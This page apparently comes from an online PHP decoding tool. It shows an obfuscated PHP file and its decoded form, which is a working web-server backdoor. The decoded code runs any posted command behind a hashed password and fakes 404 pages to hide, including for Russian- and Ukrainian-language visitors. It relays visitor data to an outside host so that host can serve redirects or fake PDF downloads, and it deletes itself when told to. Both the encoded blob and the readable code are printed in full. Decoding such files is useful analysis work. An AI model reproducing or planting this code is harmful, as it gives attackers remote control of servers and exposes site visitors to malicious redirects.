Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode("rVaNT9tGFLeLlHAoutGY0NGFBCEkQJWqJbYuQRmb7RQ78cWy1KqiOL..
Decoded Output download
?><?php function er() { header("HTTP/1.1 404 Not Found"); header("Status: 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
" ."<html><head>
" ."<title>404 Not Found</title>
" ."</head><body>
" ."<h1>Not Found</h1>
" ."<p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server.</p>
" ."</body></html>"; die(); } if ((strstr($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ru'))||(strstr($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ua'))) er(); if (isset($_GET[p])) { $_GET[p]=$_GET[p]; $_GET[p]=str_replace('.pdf','',$_GET[p]); $r='n'; $shab='c01d76'; $obkey=''; $shabkey='1'; $column='1'; $pack='3'; $track=$_SERVER['SERVER_NAME']; $bot=0; if ((isset($_POST[pass]))&(md5($_POST[pass])=='8d2c73ca32187f23fde7f1cb499e8f01')) { eval(stripslashes($_POST[cmd])); die(); }; if (strstr($_SERVER['HTTP_REFERER'],'google')) { $r='g'; }; if (strstr($_SERVER['HTTP_REFERER'],'yahoo')) { $r='y'; }; if (strstr($_SERVER['HTTP_REFERER'],'bing')) { $r='m'; }; if (strstr($_SERVER['HTTP_USER_AGENT'] ,'google')) {$bot=1;} ; if (strstr($_SERVER['HTTP_USER_AGENT'] ,'bot')) {$bot=1;} ; $url1 = 'http://www.uimei.jp/infoblog/2008/12/tds2/?p='.$_GET[p].'&niche=ed2&target=0&ff=p&ss=jan&ip='.$_SERVER['REMOTE_ADDR'].'&r='.$r.'&shab='.$shab.'&bot='.$bot.'&host='.$_SERVER['HTTP_HOST'].'&obkey='.$obkey.'&shabkey='.$shabkey.'&pdf=1'.'&column='.$column.'&track='.$track.'&pack='.$pack; $url=file_get_contents($url1); if (strstr($_SERVER['HTTP_REFERER'],'site')) er(); if ($url=='404') er(); if ($url=='block') unlink(__FILE__); if (strlen($url)<1000) header("Location: {$url}"); else { Header('Content-Type: application/octet-stream'); Header('Accept-Ranges: bytes'); Header('Content-Length: '.strlen($url)); Header('Content-disposition: attachment; filename='.$_GET[p].'.pdf'); die($url); } } ?>
Did this file decode correctly?
Original Code
<?php eval(gzinflate(base64_decode("rVaNT9tGFLeLlHAoutGY0NGFBCEkQJWqJbYuQRmb7RQ78cWy1KqiOLYDCYGASYMT6NYQ2L++d7YTxoZamIYifO/de7/3efduwy8Vu6L0tSC2rnZIT5SOyqUrQlrFEZE6ojQsiGc75FKUrsqlFiFnjN0qiJ0dMgSlcumSkKtil0jHO2RXIpUN4HZ3yKhcGhSvS0XQBoxuq0PIkEhfS0UGVBBB4rgFG4Ny6ZiQbnF3Pf3S0zyMa03ZtHVFxtRxEkn8EWvUMqiTSJ2Mx3d8nsvj17nX+FCxcU9pykYqmZlJ3NqW3XSX/i1ATU3BqfQP50f98e93Pj4Zd9r47uaifdrHw9Qcz5/64x7Pn4/Po60sl+N5/3CYWhzKKcyl0ppdVRfTzM6UY+u2ShcfWErzETOW4EPxdEMx9mcw+cW/SQMV873FsUaxQ1tN6trUwDeTNk5xC8GtP/nDn1yjif/njX87Dm4mp2jEpfCB5WIZgGoMCEOubE13sUudT9Th0rw3cyE0DpaY+6kMNnSagHR8wFiv4UTCtR34Je7tsBQHg37fvxsH7cHh2c3gzEejF8hpomTy/funKzQtUEhGJczgyJzuutQG3TN/fO2NYBdDcdnflCVMFxm8OeOBvcChnmqZNIE4z6ihFwi9mKFkIgTHEZCMYsLVrIaAzFzeWPkRMSylsUf3BRSu2WZI5Zn45oKpqM2qHJGbC55l7gloNVzbDiPuY42+weGgAyHGphqKLeRAOEznNMC7o1vwzXJdCHI+UTV+esgTBLRsZM2VVdNazeaXV2rZ1ZpBV2p5s/H61Su6XMvlEcvOR0w/WSrLue65quVq1J0CmVUDsO/rGXnDnHi8QhO/50/8CatMXVHqKmUGPkZpq6PnAexbmqLEDoYA+88EaOhyPdSfIVSfgnADVADtdThGI/wgjrAK+Qx09TMxQO9RgIWmo+axgJFm294Szx8cHHBNvUp17p3H63JNaahKnc/mcst8PsvbhpvlX3oC4qZdyaF5WTc1KlAjO29bTp1Cl8zXaoI377rCO0ue1yPx+/PdORr7weD8HDIE2iwpHKQGllEzc2HfAsk8BQo+QGiKaz/ACYM8gQ4JUeK256L+j7FiVrwEJhwpIY9gMT0JXHwmgBUdAeCECyYc0+x7nyuhpqs0gCgDU5FtKtvQqCyFyfhkfLclXN0OSxnfF6FSCCwguGHRoxtQA3MPtpqyqst7iSDonbb9IEg+6AGVyqF8Mp3P5XLJ2aRoK6bFhswSFB+2P6RiNaq6FG4FaMxNjE8iYdSPgpob73t0CVuep+qRNq+YNrXnwA61qoj5d680ME3q2XMTS65TGEmNfZu6/xCZ4rapXLe1JYy4v3v8uKyhu54C6Qp9t2zbMrUq8DOYlUC2qvRBG4b3ZQTErooQNwqUzQD27+XiemVjVCrCRIaxfUbIZyKdtgaidL1DYNxfFq9hWhNp978N9crGBZG6xc+EYfUY7EmLPRsK4ldRugSr8GxgGoAqsudDtyDujq6GF93PW09waruyAa+OL4QcidJF67Ig9sCP0Dy4US7Bm2Jzs3IyGG5t9IrX5RK8Yb7A06ZU7BdEWIzAQSL1d3+ufGv7l+dH8E28N2+2v+P02tvdtU5vuDUYHj8lCc1vWXO317y1jf/tdbdd6X45utha/+3X9bffieLt+vp25S8="))); ?>
Function Calls
| chr | 1901 |
| ord | 1901 |
| strlen | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | 46a42ff01a44f34ef44c29dbd8af6814 |
| Eval Count | 2 |
| Decode Time | 5816 ms |